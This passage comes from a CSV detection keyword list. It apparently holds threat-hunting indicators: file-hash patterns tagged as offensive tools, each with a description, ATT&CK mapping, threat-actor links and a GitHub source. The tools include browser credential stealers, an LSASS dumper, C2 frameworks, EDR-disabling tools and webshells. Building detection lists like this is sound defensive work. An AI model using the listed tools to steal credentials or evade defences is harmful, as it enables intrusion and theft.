fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34860" "*b68e24dd90e163f0048746d1c49d16f82e62608ac441df90c5f18b0b79b8b879*",".{0,1000}b68e24dd90e163f0048746d1c49d16f82e62608ac441df90c5f18b0b79b8b879.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","34861" "*b691b9066d40a8d341e06f30cc7d94c3b1db62b3f49b5869c9b1e59828995550*",".{0,1000}b691b9066d40a8d341e06f30cc7d94c3b1db62b3f49b5869c9b1e59828995550.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","#filehash","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","34863" "*b692e1272116e31f390f6b36c96a7912ed58f56958bab07db888049f5b65f111*",".{0,1000}b692e1272116e31f390f6b36c96a7912ed58f56958bab07db888049f5b65f111.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. 
Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","34864" "*b693b56c3ed54d8e250c8a7347f421df3bbe097bdd581696624257c5c656b8a3*",".{0,1000}b693b56c3ed54d8e250c8a7347f421df3bbe097bdd581696624257c5c656b8a3.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34865" "*b697318c942f44d36de647d4054759b7297ff90aba4de22d41488698b9d3e32c*",".{0,1000}b697318c942f44d36de647d4054759b7297ff90aba4de22d41488698b9d3e32c.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","34866" "*b6a20cc4035c440aa539a0a8828d4372c9b160002ef9f0e44d9f9e89ed1dfcd0*",".{0,1000}b6a20cc4035c440aa539a0a8828d4372c9b160002ef9f0e44d9f9e89ed1dfcd0.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. 
Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","34868" "*b6a255086f4aefbd0e8b4b997b146dd95b04eb7c095c21c3269cdef16f538f3e*",".{0,1000}b6a255086f4aefbd0e8b4b997b146dd95b04eb7c095c21c3269cdef16f538f3e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34869" "*b6aa7aa16083b7113fe5fe662a497c6c03a3c4aa74ff2c379b64fd9e9b495bcf*",".{0,1000}b6aa7aa16083b7113fe5fe662a497c6c03a3c4aa74ff2c379b64fd9e9b495bcf.{0,1000}","offensive_tool_keyword","HookSentry","tool for inspecting system DLLs loaded into processes - looking for functions hooked from AV/EDR.","T1055.001 - T1055 - T1057","TA0007 - TA0005","N/A","N/A","Defense Evasion","https://github.com/UmaRex01/HookSentry","1","0","#filehash","N/A","6","1","27","2","2025-04-02T12:30:58Z","2024-11-20T18:09:39Z","34872" "*b6ac954c208f9e813cbacebfbea30e9b71e252c9c35cea2aad4864cd9f1c492b*",".{0,1000}b6ac954c208f9e813cbacebfbea30e9b71e252c9c35cea2aad4864cd9f1c492b.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","34873" 
"*b6b9a733b2f7b86f8ae6a40ce230acb474f018c98e78da897a1ed631b653583c*",".{0,1000}b6b9a733b2f7b86f8ae6a40ce230acb474f018c98e78da897a1ed631b653583c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","34874" "*b6be69e72453d7363a2570495b36897124c72b2676351307f9d0d1b2a90f1b9d*",".{0,1000}b6be69e72453d7363a2570495b36897124c72b2676351307f9d0d1b2a90f1b9d.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","#filehash","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","34876" "*b6c4a39612179674c521ae2c35e3de0b91504adf36928c69e024e0c42e61e74c*",".{0,1000}b6c4a39612179674c521ae2c35e3de0b91504adf36928c69e024e0c42e61e74c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34878" "*b6d7a37a1e42825a1e744a92fb5e39ada8ef3f71c494370b35b83c77ce06c344*",".{0,1000}b6d7a37a1e42825a1e744a92fb5e39ada8ef3f71c494370b35b83c77ce06c344.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","34882" "*b6d88a58d1da289997258be70427b46ab2c124179a09bab72d3cf25c44c7ad92*",".{0,1000}b6d88a58d1da289997258be70427b46ab2c124179a09bab72d3cf25c44c7ad92.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34883" "*b6de30306cf70f10d77621a839e3be534cc938cd5736cb77887d3416aac9f27b*",".{0,1000}b6de30306cf70f10d77621a839e3be534cc938cd5736cb77887d3416aac9f27b.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#filehash","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","34885" "*b6de30306cf70f10d77621a839e3be534cc938cd5736cb77887d3416aac9f27b*",".{0,1000}b6de30306cf70f10d77621a839e3be534cc938cd5736cb77887d3416aac9f27b.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#filehash","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","34886" "*b6e5d9d7d95caf2550fecebcfe6f7c54f1779c6a65547ef342f76446dcbd6c1d*",".{0,1000}b6e5d9d7d95caf2550fecebcfe6f7c54f1779c6a65547ef342f76446dcbd6c1d.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","34887" "*b6e84d3a61b5740043470953cd2029da16edf15e7eafd372d49748c2b931ba87*",".{0,1000}b6e84d3a61b5740043470953cd2029da16edf15e7eafd372d49748c2b931ba87.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","34888" "*b6e95607f7434e41adcaa98e42af0a47571c7af29ce0418aa582658f6f539c6e*",".{0,1000}b6e95607f7434e41adcaa98e42af0a47571c7af29ce0418aa582658f6f539c6e.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","34889" "*b6ee8b7bc5bf06d29b65b730fa0aee08173fa7c0cd1b9c209f483de1edef0c65*",".{0,1000}b6ee8b7bc5bf06d29b65b730fa0aee08173fa7c0cd1b9c209f483de1edef0c65.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34890" "*b6ef9851d887120994e19521814b994f750f0eac77ddc2ae60efd75ad085b02f*",".{0,1000}b6ef9851d887120994e19521814b994f750f0eac77ddc2ae60efd75ad085b02f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration 
toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","34891" "*b6f96297c1c905e32413c6deb7e794cb8a1af37b9295e5cff257a6ff063ccbd4*",".{0,1000}b6f96297c1c905e32413c6deb7e794cb8a1af37b9295e5cff257a6ff063ccbd4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34893" "*b6fa6edb0e958a897623e837947ed04a1cb52bdb31f567c55b5f10352b4f489e*",".{0,1000}b6fa6edb0e958a897623e837947ed04a1cb52bdb31f567c55b5f10352b4f489e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34894" "*b6fb74cf4bcf1ad06bc0424af481dff96e98cf06803d450c4d9a3b621b63966e*",".{0,1000}b6fb74cf4bcf1ad06bc0424af481dff96e98cf06803d450c4d9a3b621b63966e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","34895" 
"*b6ffcd2adfacc8268724e5e8d97904743dcf15152eae87224134df705f916df3*",".{0,1000}b6ffcd2adfacc8268724e5e8d97904743dcf15152eae87224134df705f916df3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34897" "*b700d5540e96d53325b1d2616925e34694ab52a4b144a0e250263895f8bad882*",".{0,1000}b700d5540e96d53325b1d2616925e34694ab52a4b144a0e250263895f8bad882.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","34898" "*b701f7ca92ab2180873b070d6a3354819c642c077ba7d9ab96eb20e876b9297d*",".{0,1000}b701f7ca92ab2180873b070d6a3354819c642c077ba7d9ab96eb20e876b9297d.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - 
TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","34899" "*b704713e230f60048904dcdcd8d61c7ef8f2750a60d52f57b914c44f1bae5054*",".{0,1000}b704713e230f60048904dcdcd8d61c7ef8f2750a60d52f57b914c44f1bae5054.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","34900" "*b710e7fbb1b4fbe07cc648c967c94a516308cfb0914f16ac5357f8caedc9f375*",".{0,1000}b710e7fbb1b4fbe07cc648c967c94a516308cfb0914f16ac5357f8caedc9f375.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","34903" "*b718b5c185eb16e7276da28a376095a99f45007a953080ad759d3c839d0c520f*",".{0,1000}b718b5c185eb16e7276da28a376095a99f45007a953080ad759d3c839d0c520f.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","#filehash","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","34904" 
"*b718d3a910fabbc4b525692d01c031565b84a9e6d4d4ce2a5df0dd67170165d0*",".{0,1000}b718d3a910fabbc4b525692d01c031565b84a9e6d4d4ce2a5df0dd67170165d0.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","34905" "*b7204f1550e45bc13a6d896883bee7ac7a5a80442c77a86a6a33d74e6e69df73*",".{0,1000}b7204f1550e45bc13a6d896883bee7ac7a5a80442c77a86a6a33d74e6e69df73.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","34907" "*b72190a931400b03dc744f734d29162310c694f7bb85c9a78fb72589301dceae*",".{0,1000}b72190a931400b03dc744f734d29162310c694f7bb85c9a78fb72589301dceae.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","34908" "*b72782bc3e57e54fe21104feeb218779cf739eafafab30b70a0d75f89083cdcd*",".{0,1000}b72782bc3e57e54fe21104feeb218779cf739eafafab30b70a0d75f89083cdcd.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","34909" 
"*b7291585c934f4554e645642cebf82f663316646ccf4360f356ff535d2d6c969*",".{0,1000}b7291585c934f4554e645642cebf82f663316646ccf4360f356ff535d2d6c969.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","34910" "*b7353069ada87797ea078b2abeb93751bb907edf28ecfa3f1479bcb79f16359f*",".{0,1000}b7353069ada87797ea078b2abeb93751bb907edf28ecfa3f1479bcb79f16359f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34912" "*B7355478-EEE0-46A7-807A-23CF0C5295AE*",".{0,1000}B7355478\-EEE0\-46A7\-807A\-23CF0C5295AE.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","0","#GUIDproject","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","34913" "*b735a1196f7a065564c3271323918fb345b4865338093eb8c9fb04d5840c8352*",".{0,1000}b735a1196f7a065564c3271323918fb345b4865338093eb8c9fb04d5840c8352.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34914" 
"*b73fbf8da2f5fdb2cc06ee3d3995e1b63f03b34ce734bf1bdde49bb15af3f696*",".{0,1000}b73fbf8da2f5fdb2cc06ee3d3995e1b63f03b34ce734bf1bdde49bb15af3f696.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34916" "*b74c431349454dc79731099eebfefca97b6b1d735e6c0269b5a4501e3fee6529*",".{0,1000}b74c431349454dc79731099eebfefca97b6b1d735e6c0269b5a4501e3fee6529.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34917" "*b74d7e3096956fd4bc7c929c2b482969f13a465058276ee97eb76c1d30529aa4*",".{0,1000}b74d7e3096956fd4bc7c929c2b482969f13a465058276ee97eb76c1d30529aa4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34918" "*b7554de4073bb94a00faac4f83fc081f418158073d75ac53d06af29fde8efe9d*",".{0,1000}b7554de4073bb94a00faac4f83fc081f418158073d75ac53d06af29fde8efe9d.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","34921" "*b75be6d2ff15abf81ac056295c5a397177de01718d05bba61e5abc025d9977f9*",".{0,1000}b75be6d2ff15abf81ac056295c5a397177de01718d05bba61e5abc025d9977f9.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","0","#filehash","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","34922" "*b75d4f2cb82be9e774f78020bb86d8df9a8eeb6ceac18b823c4c6459a3ca7faf*",".{0,1000}b75d4f2cb82be9e774f78020bb86d8df9a8eeb6ceac18b823c4c6459a3ca7faf.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","34923" "*b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0*",".{0,1000}b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/","1","0","#filehash","webshell used with proxylogon exploitation","10","10","N/A","N/A","N/A","N/A","34924" "*b75fb086b5f0f38428c19a54675729901ca63bb056f48e99bf4a848263ccd901*",".{0,1000}b75fb086b5f0f38428c19a54675729901ca63bb056f48e99bf4a848263ccd901.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34926" "*b7604b1463e8ea6d3829d8b6fd147911877b925e920ae530622283d4f7cefed9*",".{0,1000}b7604b1463e8ea6d3829d8b6fd147911877b925e920ae530622283d4f7cefed9.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","34927" "*b764c55e619f1368b2b6ec3af8ce4c799a56b1d0d9e1fc19d2f204f7a94d4424*",".{0,1000}b764c55e619f1368b2b6ec3af8ce4c799a56b1d0d9e1fc19d2f204f7a94d4424.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
